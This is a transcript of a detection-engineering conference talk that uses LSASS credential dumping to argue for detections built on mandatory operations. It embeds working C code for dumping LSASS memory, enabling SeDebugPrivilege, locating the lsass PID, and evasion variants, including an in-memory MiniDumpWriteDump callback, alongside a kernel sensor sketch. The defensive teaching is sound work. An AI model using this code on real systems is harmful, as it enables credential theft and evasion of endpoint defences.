
Dissecting Tradecraft: Building Robust Detections Through Tradecraft Decomposition

Using the MITRE ATT&CK framework as a foundation, we will explore how adversary procedures can be broken down further into variants, each comprising a series of discrete operations. By zooming in on these operations, security professionals can attain a granular understanding of the threat landscape, enabling the development of more effective detection mechanisms.

About Matt Hand & Prelude

Thanks for coming. I'll skip through the majority of this. I work at Prelude. We work on threat management, just trying to make sure that EDR works the way you would expect it to when you need it to. I'm here today to talk about robust detections, specifically focused on techniques. How many detection engineers are here, just by a show of hands? A handful, OK.

Well, hopefully we can convince you guys that there may be a simpler way of approaching detection engineering that kind of pushes away a lot of the noise.

So we have to kind of have a bit of a reality check here for a second. Anyone here who's worked in incident response, offensive security like I used to, or really any aspect that deals with confronting incidents directly knows that right now adversaries have more tools at their disposal than ever.

Reality of our situation

2019 was the year of the C2. We went from, you know, a handful to what felt like hundreds, plus a bunch of different offensive tools up on GitHub; things that I've written live there. This is only getting worse now. The barrier to entry for capability development used to be relatively high: you had to be able to write code, test code, understand internals, understand tradecraft.

Now, if you can handle just the code generation aspect, it becomes much easier. We have Copilot, which is trained on GitHub data, and GitHub is where all of our offensive tools live. So it's easier than ever for an adversary to begin capability development.

And then when they have these tools and they get caught, trivial modifications to them are very, very frequent. We see hundreds of different variations of something, modifications as trivial as changing "mimikatz" to "manydogs." It's as simple as that, and it breaks production detections today. Unfortunately, when you start getting into more nuanced things like instruction manipulation, it gets even worse, and things start falling apart really, really quickly. What this leads to is, frankly, what I view as low-skill threat actors: e-crime operators, ransomware-as-a-service people that are just kind of, you know, throwing stuff at a wall until something sticks.

Red team operators, pen testers, they're winning today more frequently than not. And that's not okay, especially when the stakes are as high as they are today. And then imagine what a really advanced adversary can do with actual apex or nation-state capabilities. It's a bit of a different paradigm. So I think our strategies for how we build detections today are fundamentally broken.

And I want to talk to you about why that is and what we can do about it. So here's a map of all of the behaviors exhibited by a garden-variety credential dumper. If you've ever done reverse engineering on an entire piece of malware, don't worry, this isn't the interesting part; it's just a summary of how complex these systems get. This is everything from "I deliver a payload" to "I have your credentials." That's it. Just, you know, run a thing, give me your password.

That's an insane amount of information. Has anyone even been able to read all of the boxes on the slide yet? That's insane. And it's not useful, which is the bigger problem. So the root of the problem is that when we're looking at malware, when we're looking at tools, I don't think we're asking the right question in the first place. We spend so much time focused on what the code looked like when it was delivered: what was the file extension, did they nest the files, how was it obfuscated, what packer did they use? All of these different things that resulted in code being executed are in our purview for detection. But does that really matter? Do we care how that shellcode got into memory? Sure, in certain cases. But who here does actual attribution, with the ability to actually impose costs, right?

Who works for the FBI is really what this boils down to. If you're not actually doing attribution, cool, get that data. But is that what you should be focusing on with the five detection engineers who are holding up your entire security program on their shoulders? Probably not, right? So it's arguably just not applicable for a majority of cases. Why are we focusing on it? Because it's interesting, surely. But is it useful?

We should be asking instead: what behaviors did that malware or tool exhibit? That's not a controversial point. Behavioral detections have been around for my entire career, going on 15 years now. But we've strayed so far that we don't box or scope our definition of behavior well enough. Everything that comes before and after the execution of the technique ends up in scope.

So if we go back to our credential dumper: if we're focused on detecting credential dumping, that's the only thing that matters. This second-to-last line, that's credential dumping. That's what we're building the detection off of. Let's focus on that. Let's not worry about which shellcode loader and which packer and all that. That's interesting, but not useful. So here is my thesis: very little about a technique actually matters when you're building robust detections.

Practical example

That's the entire premise of this talk: that very little of anything we look at today truly matters when we're trying to build a detection to catch more than one version of a thing. And by identifying what those basic attributes are, we can focus our efforts on those, make meaningful change, and build strong, effective detections that are resilient in a changing environment.

So sticking with the credential dumping theme, we're going to use a practical example of OS credential dumping from LSASS. Who here has used Mimikatz before, or run Mimikatz? Pretty common, right? The whole gist of it is that if I can get a handle to LSASS, the Local Security Authority Subsystem Service, the lsass.exe process, I can read its virtual memory and extract credential material from it. Pretty common. Everybody and their mother has done it.
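To make that concrete, here's a minimal sketch in C of just those two steps, assuming the caller already knows the lsass.exe PID and is running with sufficient privileges; the function name and the lack of error handling are mine, not any particular tool's.

```c
// Minimal sketch: obtain a handle to LSASS, then read its memory out
// via a minidump. Assumes the PID is already known and the calling
// context has the access it needs (e.g. SeDebugPrivilege).
#include <windows.h>
#include <dbghelp.h>
#pragma comment(lib, "dbghelp.lib")

BOOL DumpLsass(DWORD lsassPid, LPCWSTR outPath)
{
    // Operation 1: obtain a handle to LSASS with enough rights to read it.
    HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                               FALSE, lsassPid);
    if (!hProc) return FALSE;

    // Operation 2: read LSASS's virtual memory (here, dumped to a file).
    HANDLE hFile = CreateFileW(outPath, GENERIC_WRITE, 0, NULL,
                               CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) { CloseHandle(hProc); return FALSE; }

    BOOL ok = MiniDumpWriteDump(hProc, lsassPid, hFile,
                                MiniDumpWithFullMemory, NULL, NULL, NULL);
    CloseHandle(hFile);
    CloseHandle(hProc);
    return ok;
}
```

Everything else a real sample does, the loaders, packers, and checks, is wrapped around those two calls.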

Every threat actor that I can think of does some version of this, whether with native Windows facilities, custom-written tools, or C2 frameworks. There are so many different variations of doing this that it's pretty much the canonical example of "somebody did a bad thing." So we'll use this. Here is some available public tooling to do this. There may be some familiar names there, right? We see Mimikatz, that's the canonical example. There are 28 in this list.

There are 28 because I gave myself a 30-minute timer to name as many tools off the top of my head as I could. Again, I'm a red teamer by trade; these are things that I use, so maybe I'm a little more keyed in, but 28 in 30 minutes from just Google searching and memory. That's insane. Are these all actually different ways to dump credentials from LSASS? I don't think so. So why are there so many?

Well, what happens when you're doing malware development or tooling development is that you have to adapt to stress. So anyone who's ever done athletic training, that graph right there should look pretty familiar. That's a stress-recovery-adaptation cycle. You introduce a stressor that hurts you, then you adapt to that stressor and produce something that's better, and you do that iteratively. That's how you get stronger. All things in security tie back to biology, come to find out.

So Mimikatz in this example is pretty much the new EICAR test string. If you drop Mimikatz on a box and it doesn't get caught, something is horrifically wrong. So we have to have a different version of Mimikatz. The stress of endpoint protection required an adaptation to our strategy for dumping credentials from LSASS. And these are often only minor changes to the logic of the program that will get around detection strategies today. Again, we're so specific on...

You know, a common Mimikatz detection strategy is to flag on the process rights that are requested in a call to OpenProcess. Pretty garden-variety Mimikatz detection. Well, what if I request something different? It completely falls apart. So we can just change little tiny things about Mimikatz, or any other example, to break detections. But that's just the face-value stuff. It goes so much deeper than that.
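Before going deeper, here's roughly what that access-mask tweak looks like; the masks below are illustrative, not the exact values any given rule keys on.

```c
// Same operation, "obtain a handle to LSASS", expressed with two different
// access masks. A rule matching one exact mask won't fire on the other,
// even though the capability gained is effectively the same.
#include <windows.h>

void HandleVariants(DWORD lsassPid)
{
    // The "classic" request that many rules are written against:
    HANDLE a = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                           FALSE, lsassPid);

    // A trivially modified sample asking for a broader (or just different) mask:
    HANDLE b = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsassPid);

    if (a) CloseHandle(a);
    if (b) CloseHandle(b);
}
```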

We can add or remove functionality to change things down to the size and code flow of the sample. We can swap function calls; who remembers the whole syscall thing that happened a couple of years ago? That's all it is. It's just changing the entry point in the call stack. You're not actually changing anything; you're still doing the exact same thing, just entering through a different path. Minor changes like this happen because they're very, very low cost. And if they're already low cost at the human level, not to be the AI boogeyman, but that's what it's really good at. With Copilot you say, "Hey, give me five different ways to call this function," and it says, "here you go." It's probably wrong, but it works in a case or two, and it lowers the barrier to entry. Apparently the barrier to entry for PowerPoint is too high for me. Let's see. There we go.

So these changes don't cost a lot in terms of time and effort, so they're very easy to make. Adversaries have a low cost to implement them, so they can produce a ton of different samples, which is how we end up with those 28. So when we're looking at that crazy graph that I showed and saying this is just too much, we need to take a step back and redefine the behaviors that we would expect out of a credential dumper. But to do that, we actually run into an issue with ATT&CK.
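As an example of that call-stack swap, here's a hedged sketch that reaches the same operation through ntdll's NtOpenProcess instead of kernel32's OpenProcess; the locally defined CLIENT_ID-shaped struct and the GetProcAddress lookup are just one way to express it.

```c
// Same operation again, but entered through ntdll instead of kernel32.
// A detection keyed to OpenProcess specifically never sees this path.
#include <windows.h>
#include <winternl.h>

// CLIENT_ID layout expected by NtOpenProcess (defined here by hand).
typedef struct { HANDLE UniqueProcess; HANDLE UniqueThread; } MY_CLIENT_ID;

typedef NTSTATUS (NTAPI *pNtOpenProcess)(PHANDLE, ACCESS_MASK,
                                         POBJECT_ATTRIBUTES, MY_CLIENT_ID *);

HANDLE OpenLsassViaNtdll(DWORD lsassPid)
{
    pNtOpenProcess NtOpenProcess_ = (pNtOpenProcess)GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "NtOpenProcess");
    if (!NtOpenProcess_) return NULL;

    OBJECT_ATTRIBUTES oa;
    InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
    MY_CLIENT_ID cid = { (HANDLE)(ULONG_PTR)lsassPid, NULL };

    HANDLE hProc = NULL;
    NtOpenProcess_(&hProc, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
                   &oa, &cid);
    return hProc;  // functionally the same handle OpenProcess would return
}
```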

Expanding ATT&CK

Who here has heard of ATT&CK before? It's a common way of referencing any kind of adversary tradecraft. There are many different opinions on its usefulness, but I think we can all generally agree that if I say "OS credential dumping from LSASS" and there's a canonical way of referencing that, it's useful. ATT&CK works on a three-tier system: tactics, techniques, and procedures. Procedures are the lowest-level description of how something is done.

So a technique would be OS credential dumping. But when we need to describe tradecraft, we end up going lower, because we don't have a sufficient degree of resolution for what we're actually trying to say. If we're saying OS credential dumping from LSASS, there are many different ways to do that, as we'll talk about in a second. There has to be something lower than that.

So we found that there are two layers below procedure. Before Prelude, I worked at SpecterOps on the adversary detection team, and that's where this terminology was coined: operation and function. It has since been further publicized by Jared Atkinson, who's really pushing this as an idea, and I'm very, very thankful for that. The operation is that next step lower than a procedure: the high-level step taken, like "I need to get a handle to LSASS."

Open a handle to LSASS with sufficient privileges: it describes a step in a procedure. And the function is the specific way that you do that. A procedure will have one or more operations, and an operation will have one or more functions. So the function is that very specific level, like "Mimikatz calls OpenProcess with these rights."
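One rough way to picture those cardinalities is as a data model; the type and field names below are invented for illustration, not an established schema.

```c
// A procedure is an ordered set of operations; each operation can be
// expressed by one or more concrete functions.
#include <stddef.h>

typedef struct {
    const char *name;            // e.g. "OpenProcess(PROCESS_VM_READ, ...)"
} Function;

typedef struct {
    const char *description;     // e.g. "Obtain a handle to LSASS"
    const Function *functions;   // one or more concrete expressions
    size_t functionCount;
} Operation;

typedef struct {
    const char *technique;       // e.g. "OS Credential Dumping: LSASS Memory"
    const Operation *operations; // one or more ordered steps
    size_t operationCount;
} Procedure;
```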

That level of resolution is already how we naturally think when we're reverse engineering malware or doing code review of open source tooling. So that's what we do: when we look at these samples, we create these lists of functions. This describes the behavior of any of these tools; it's essentially the call stack, and you're doing a code review to produce it. So I have four samples right here that we'll pick on for no real reason, just a relative sample size that we can work with to show similarity.

So if we look at each of the specific versions of this, this is a lot to recognize. SafetyKatz itself has 10 steps, and all SafetyKatz does is run Mimikatz. That's it. There's really not a lot of difference in it, but it's still 10 different things that we have to catalog.

So how would I build a detection for SafetyKatz? Would I catch it opening a handle to LSASS? Sure, that's a strategy. What about the call to MiniDumpWriteDump to create the dump file that's then parsed by the loaded copy of Mimikatz? Do we write a detection for Mimikatz being loaded? That doesn't sound like a great strategy when we know that after 30 minutes of me sitting down, I could name one tool per minute. That's not a good use of your time. And then this permeates down to all the other things. And then all the new tooling comes out.

What happens if somebody drops something on Twitter right now and you have to build a detection for it? What are you going to do? It's this never-ending thing. And this is just one technique of the 700-something that are in MITRE ATT&CK Enterprise v15, or whatever version they're on right now. This is a lot. So we need to simplify this even further. Functions are just naturally how we think when we're doing reversing or reviewing code for open source tooling. They are overly specific, though.

Simplification

They're so keyed in on the specific way that a tool or a piece of malware does something that slight variations, if we build our detection logic off of them, can make our detections behavioral but brittle. An example of this is people who build detections off function calls. If you built a detection off of a call to OpenProcess, and an NtOpenProcess call happens instead, they're literally the exact same thing. There is no fundamental difference, but it will break your detection. It's too specific. We shouldn't be working at that layer. So when we're looking for commonalities between these tools (again, a robust detection catches more than one variation of a tool or a technique), it helps to summarize at the operation level, which is just one layer higher, closer to procedure.
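One way to picture working at that layer is a small normalization table, purely illustrative, that maps the concrete function names your telemetry shows you onto the operation they express, so the rule doesn't care which function a sample happened to use.

```c
// Map concrete functions (what telemetry records) to the operation they
// express. A detection written against the operation survives the swap
// from OpenProcess to NtOpenProcess, direct syscalls, and so on.
#include <stddef.h>
#include <string.h>

static const struct { const char *function; const char *operation; } kMap[] = {
    { "OpenProcess",         "obtain-handle-to-process" },
    { "NtOpenProcess",       "obtain-handle-to-process" },
    { "ReadProcessMemory",   "read-process-memory"      },
    { "NtReadVirtualMemory", "read-process-memory"      },
    { "MiniDumpWriteDump",   "read-process-memory"      },
};

const char *OperationFor(const char *function)
{
    for (size_t i = 0; i < sizeof(kMap) / sizeof(kMap[0]); i++)
        if (strcmp(kMap[i].function, function) == 0)
            return kMap[i].operation;
    return "unknown";
}
```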

So that's what this looks like. We can summarize the same four samples into at most eight operations. So instead of saying, well, we called OpenProcess with these flags or whatever to catch this thing, it doesn't really matter: it's "obtain a handle to LSASS." That's all that really matters out of this. We drop some of the specificity for intentional generality, which then allows us to remove noise.

Removing noise

So what happens if we strip away all of the things that are not directly related to or required for credential dumping? Going back, we have "perform system checks" as a common operation, "resolve functions" as another. Some of these operations are shared amongst samples, but are they actually required? We can minimize the set even further and say, well, this is the stuff that is actually required to dump LSASS. The only things that are technically required are a handle to LSASS and a call to read its memory. Those are the only things that are truly required. And depending on the way in which you read memory, there may be one or two small variations, but not a substantial amount.

So in order to do this, we already had this minimized set. We took functions that came from the product of reversing, we summarized those, and then we removed all of the information that just isn't actually required. So there are significant overlaps when we go back to the mandatory operations that are common between samples. Each action in here leads to the next; it's an ordered set.

That creates a unidirectional graph, a graph that flows one way. So if we take those four samples and merge them into one graph that demonstrates control flow, it'll end up looking like this. Graphs are super cool; they're just a nice logical way to think about things, but this one actually represents the control flow of operations. So in our four samples, the commonalities between them were adjusting token privileges; the token privilege you need to dump credentials is SeDebugPrivilege.

You need to locate the process identifier for lsass.exe, which is a requirement for the OpenProcess call to get a handle. And once you have a handle, you can then pass it to a function which will read LSASS's memory. Pretty common flow, but these are the fundamental steps of how almost every credential dumper works. But even then, those can be qualified further. So why weren't all of those present in every tool?

Qualifying operations

Well, simply put, they're not actually required. Think of things that can be done outside of the specific sample. Can you derive LSASS's PID and pass it as a command-line argument to a tool? Of course; that's how a good majority of them work. Can you ensure that SeDebugPrivilege is enabled for the token of the context you're going to run the credential dumper under? Of course. You don't actually have to check it; you can just say, I assume this is enabled, and if not, I'm just going to fail.

Not a great development strategy, but a realistic one. This creates two different categories. There are mandatory operations, things that have to happen, and supporting operations, things that can happen to facilitate the mandatory operations. So think: mandatory means you have to see this in the credential dumper; supporting means you likely will see this in the credential dumper. Does that make sense? Nobody's asleep yet. This is good. Okay.
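For reference, here's a hedged sketch of what those two supporting operations often look like when a tool does them in-process; the Toolhelp snapshot is just one of several ways to find the PID, and as noted above, either step can instead be pushed outside the sample, for example by taking the PID as a command-line argument.

```c
// Supporting operations: enable SeDebugPrivilege on the current token and
// locate the lsass.exe PID. Error handling is trimmed for brevity.
#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>
#pragma comment(lib, "advapi32.lib")

static BOOL EnableSeDebug(void)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp = { 1 };   // PrivilegeCount = 1
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;
    LookupPrivilegeValueW(NULL, L"SeDebugPrivilege", &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL ok = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
    CloseHandle(hToken);
    return ok && GetLastError() != ERROR_NOT_ALL_ASSIGNED;
}

static DWORD FindLsassPid(void)
{
    DWORD pid = 0;
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == INVALID_HANDLE_VALUE) return 0;

    PROCESSENTRY32W pe = { sizeof(pe) };
    if (Process32FirstW(snap, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) {
                pid = pe.th32ProcessID;
                break;
            }
        } while (Process32NextW(snap, &pe));
    }
    CloseHandle(snap);
    return pid;
}
```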

Action-oriented detection engineering

So we have 28 tools that we reduced down to just two mandatory actions: obtain a handle to LSASS, and read LSASS's memory. Those are the only two things that mattered for the credential dumper. This is intuitive; we know this already, but now we have a language to define it, and we can build detection strategies off of it. So now that we have these actions or operations well defined, it becomes a game of: what can your EDR do about that? Obtaining a handle to LSASS is a pretty common one. The way most EDRs catch OS credential dumping is to watch for a handle being opened to a process object; if the process object matches the name lsass.exe, report the request back, and sometimes block it, depending on the vendor. That exists in pretty much everything today.
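For a sense of where that telemetry comes from on the sensor side, here's a very rough, illustrative sketch of the usual mechanism, a kernel object-manager callback registered with ObRegisterCallbacks. Driver and registration boilerplate are omitted, the access-right constants and the undocumented PsGetProcessImageFileName export are declared by hand, and the callback name is mine.

```c
// Fires on every process-handle creation. If the target is lsass.exe,
// report it, and (optionally) strip memory-read rights from the handle.
#include <ntddk.h>
#include <string.h>

// Undocumented ntoskrnl export: returns the short image name of a process.
NTKERNELAPI PCHAR NTAPI PsGetProcessImageFileName(PEPROCESS Process);

#ifndef PROCESS_VM_READ
#define PROCESS_VM_OPERATION 0x0008
#define PROCESS_VM_READ      0x0010
#define PROCESS_VM_WRITE     0x0020
#endif

OB_PREOP_CALLBACK_STATUS PreProcessHandleOpen(
    PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION Info)
{
    UNREFERENCED_PARAMETER(RegistrationContext);

    if (Info->ObjectType != *PsProcessType ||
        Info->Operation != OB_OPERATION_HANDLE_CREATE)
        return OB_PREOP_SUCCESS;

    PEPROCESS target = (PEPROCESS)Info->Object;
    if (_stricmp(PsGetProcessImageFileName(target), "lsass.exe") == 0) {
        // Emit a telemetry event here (omitted). Some products also strip
        // the rights that would allow reading LSASS memory:
        Info->Parameters->CreateHandleInformation.DesiredAccess &=
            ~(ACCESS_MASK)(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION);
    }
    return OB_PREOP_SUCCESS;
}
```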

Some EDRs have a remote virtual memory read detection. If we have both of those in our EDR, we can say, well, I can catch it here on this mandatory operation, or I can catch it there. But which one would you choose? The trick to all of this is in that graph that I showed: what is the rightmost node? What is the final action taken?

Is opening a handle to LSASS actually indicative of credential dumping? Of course not. It's just opening a handle to LSASS. You could do that in a benign sense. For some reason, Google Update Helper does that, so we have to write an exclusion. Does Google Update Helper read LSASS's memory, though? I really hope not. Not the legitimate version, anyway. It may; that would be terrifying.

So we have to pick one of them. Orient to the rightmost node, start there, and then work your way back. What that does is say: this is the most indicative of the thing. If I don't have telemetry for that, go to the next one back. It's still a mandatory operation, so it has to happen, but I can decide that this is the best version of it I can see. Once you start going into supporting operations, the detection starts falling apart, and further down the chain it really starts falling apart, like assuming that a file will be written because the tool calls MiniDumpWriteDump. Well, what happens if you use a callback in MiniDumpWriteDump and now all of a sudden that doesn't hold? Focus right, then work your way backwards as needed.
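That callback trick is worth seeing once. Below is a hedged, simplified sketch of dumping into a caller-owned buffer instead of a file by answering dbghelp's I/O callbacks; the fixed buffer size, helper names, and lack of error handling are all simplifications.

```c
// Answer the minidump I/O callbacks so the dump bytes land in our own
// buffer; no file is ever written, so file-write-based detections see nothing.
#include <windows.h>
#include <dbghelp.h>
#include <string.h>
#pragma comment(lib, "dbghelp.lib")

static BYTE   *g_buf  = NULL;
static ULONG64 g_size = 0;

static BOOL CALLBACK DumpToMemoryCallback(PVOID param,
                                          const PMINIDUMP_CALLBACK_INPUT in,
                                          PMINIDUMP_CALLBACK_OUTPUT out)
{
    (void)param;
    switch (in->CallbackType) {
    case IoStartCallback:
        out->Status = S_FALSE;   // "I'll handle the writes myself"
        break;
    case IoWriteAllCallback:
        memcpy(g_buf + (SIZE_T)in->Io.Offset, in->Io.Buffer, in->Io.BufferBytes);
        if (in->Io.Offset + in->Io.BufferBytes > g_size)
            g_size = in->Io.Offset + in->Io.BufferBytes;
        out->Status = S_OK;
        break;
    case IoFinishCallback:
        out->Status = S_OK;
        break;
    default:
        break;
    }
    return TRUE;
}

BOOL DumpLsassToMemory(HANDLE hLsass, DWORD lsassPid)
{
    // Fixed-size scratch buffer for brevity; real LSASS dumps can be larger.
    g_buf = (BYTE *)VirtualAlloc(NULL, 256ull * 1024 * 1024,
                                 MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!g_buf) return FALSE;

    MINIDUMP_CALLBACK_INFORMATION cb = { DumpToMemoryCallback, NULL };
    // With the I/O callbacks answering every write, no file handle is needed.
    return MiniDumpWriteDump(hLsass, lsassPid, NULL,
                             MiniDumpWithFullMemory, NULL, NULL, &cb);
}
```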

Validating with functions

So now that we have a detection strategy, the rightmost node within the mandatory operations category, we have to validate it. This is where things get interesting, and you really start finding out how weird offensive security tooling actually is, and how similar everything is. If we classify everything into a family, saying credential dumping is comprised of these two or four parts, depending on how we want to talk about it, what are the unique expressions of those two or four things? That's where you start creating these families. And these families are identified by how they achieved those operations: what functions, specifically, did they use?

So to open a handle to LSASS, it may be a call to OpenProcess, maybe a call to NtOpenProcess. It may be stealing a handle. It may be leaking a handle from the kernel. Those are four different ways that I just named. And then for reading virtual memory, it may be ReadProcessMemory, it may be something like a duplicated handle or a kernel primitive, but it's an arbitrary read.

There are a bunch of different ways: MiniDumpWriteDump, MiniDumpWriteDump with a callback, and so on. These are all unique functions that describe an operation. But when you catalog all of those and go back to our original graph, saying, hey, these tools use these functions, you start finding that there's massive overlap.

What actually changes is the language that was used and the evasion crap-stacking that tends to happen: I'll just stack this ETW disable thing, and then I'll use direct syscalls, and then I'll turn off Defender, and then I'll do credential dumping. It's like, that didn't matter at all. It's just nonsense that you stacked in there; it's very safe to just ignore. And then if we say, okay, I actually just used OpenProcess and MiniDumpWriteDump, well, so did these other 15 tools. And you create these families.

And that becomes your validation set. Those are unit tests for your detections. Now you have a strategy for validating these now-robust detections that are built off of these mandatory operations.

So wrapping this up: don't focus on the tool specifically when building technique- or procedure-based detections. If we have a general understanding of what the flow of a technique is, what the mandatory operations are that have to happen, we can say: I don't care about the tools. I'll build a detection for those operations and then validate with the tools later, as unit tests. You could take all 28 that I named and run them through it, and you wouldn't really see a difference. You'd just catch them, because the operations are all the same; the functions are the only thing that's different.

And then when we're analyzing malware or any kind of tooling, just take a step a little bit below the procedure level. Don't go as deep as you naturally would when you're doing a code review or reverse engineering and saying, here are the specific functions that were used; that's too low a level. You want somewhere between procedure and function, which is naturally the operation. So just summarize the operation in human language, whatever makes sense to you. There's no agreed-upon language, and MITRE is not going to extend ATT&CK to do this. This is all an idea that you keep in your head and just think:

I'm describing a technique and I'm looking at a sample that is comprised of functions. Let me summarize the functions into something that I can use.

Acknowledgements

So just two quick acknowledgements here. Two people have contributed greatly to my viewpoints on this and how I've grown to understand it as time has gone on, especially coming from a red team perspective. I'm used to breaking things and trying not to get caught; now I'm really in the business of trying to catch everything that I broke. Michael Barclay, a brilliant researcher on my team, wrote a really cool tool called Cartographer that actually models all of this behavior. He has Cartographer running as a web app, so go poke around there and see what this looks like in practice.

And then of course Jared Atkinson. He has a blog series called On Detection that discusses this in an incredible amount of detail: the philosophy behind why we think this way and some of the ways we can think about it slightly differently. Two brilliant researchers I'm very, very thankful to have learned from.

But that's the end of the talk. I'm happy to answer any and all questions here or at our booth. Just as a quick note, we have a booth in the expo hall that I'm hanging out at all week. So if you want to talk about this long-form, and questions in front of the room aren't really your forte, come meet us there. I'm happy to talk for however long you'd like.

Question and answer

Scheduled tasks is a good one, because that one's actually not really that complicated, but it's everywhere. Services too. In Jared's blog posts, where I use credential dumping for everything, he uses services for his examples. That's another really interesting one where a lot of the research is pre-done.

The first one is, you said MITRE or ATT&CK wouldn't necessarily solve this. I would think that, because these are, I believe, repeatable things (when you do it once, you can share it with others), do we maybe need a framework that tries to solve this at a deeper level? And the second question is, some of this stuff is out of the detection engineer's hands. For example, some of this can only be solved at the EDR level, because it targets specific telemetry that you cannot necessarily get or understand, because the EDR abstracts it for you. So perhaps it says, "I detect credential dumping," but you don't necessarily have the information. So I don't know, can we maybe distinguish between the consumer of the telemetry from the EDR and the detection engineer at the EDR level, if that makes sense?

Yeah, those are two really great questions. So the first one, and make sure I don't miss these, because my train of thought's gonna go all over the place. The first one was around, you know, ATT&CK not really being adaptable to this. I don't necessarily think that it's impossible to adapt; I just think that it's not incentivized to do so. I agree, this is largely a one-time effort.

It does change from operating system version to operating system version. That's kind of what my team does, the research into this area. I agree that it's a knowledge-sharing thing to a certain degree. And a big thing that I'm passionate about is that researchers are really expensive, hard to find, and usually pretty prickly. Not everyone can afford or should have researchers. So if someone's going to do the research, we should share it and make sure that people are able to use it. That way the barrier to entry isn't your research ability, it's your ability to build a good detection in your environment. So I don't think MITRE will accept this, because it's such a massive thing and it doesn't really hold true to their model. They just added financial theft as a technique, and what are the procedures of that, let alone operations? Open a bank account? What am I gonna do about that? It doesn't matter. So it doesn't really apply to their model in general.

Maybe it is a different way of talking about it. Michael Barclay's Cartographer project is what we're kind of hedging on, just having a way to discuss it. And if that's something you're interested in, contributions are very welcome there. But it's like the XKCD comic: this standard sucks, let's build another standard; five years later, this standard sucks. So I don't know if a new framework will solve it.

In terms of detection engineering, decoupling that from the EDR, those are very real problems that we deal with. I'm not going to shill my company too much here, but we see where the EDR failure points are, and they differ greatly between vendors. And at some point, say with SentinelOne, they use a lot of aggregate events. So this event and this event together mean this thing, but I can't see event A or event B; they just combine them all.

That makes it really tough to say, well, what part did you see? That comes down to making a demand of your vendor and being like, hey, I appreciate you doing this thing, but you've abstracted too much. Just be vocal with your vendors and say, hey, I actually need visibility into this data. And if they don't have it, make noise. That's really the best that we have today. But yeah, I agree. It's a very sore point that I'm very invested in solving.

Hi, great talk. Completely agree with everything you're saying. I was curious, because when you have a generic detection like you mentioned, you're also going to have false positives, right? Things change, you have a big environment, and there's a lot of weird stuff going on. So I'm thinking, do you think the same type of reasoning can be used to create those exclusions? So that, instead of being super specific, you know, the Chrome or whatever example you mentioned, it doesn't become too specific when it comes to handling that whitelisting? What's your view on handling that?

Exclusions are so dangerous, just for the natural reason that as soon as you introduce an exclusion, that's an opportunity for a bypass. You whitelist a file and now all of a sudden malware can masquerade as that. Those are legitimate problems. But what we found exploring this methodology is that by using these mandatory operations, the further right you go, the fewer false positives there are. So the Google Update Helper thing, right? That's opening a handle; you have to write an exclusion for it. Google Update Helper does not read memory.

So if you can build your detection around reading memory, there are fewer total events, period, for you to have to write exclusions on. So those exclusions become much more tolerable to make specific. For applying this methodology to what you exclude, I think it becomes tricky, because the difference between a false positive and a true positive can sometimes be immeasurable. They may do the exact same thing, and there's no real way to distinguish them, so there are other attributes that you look at, like, you know, was the calling binary signed?

All the traditional things that you would do. But right now exclusions are kind of a weak point, where now we have to have complex joins and it just gets messy. But yeah, I'd be really interested to hear if anybody has thoughts on that specifically, because it's a realistic part of the ecosystem right now. Thank you.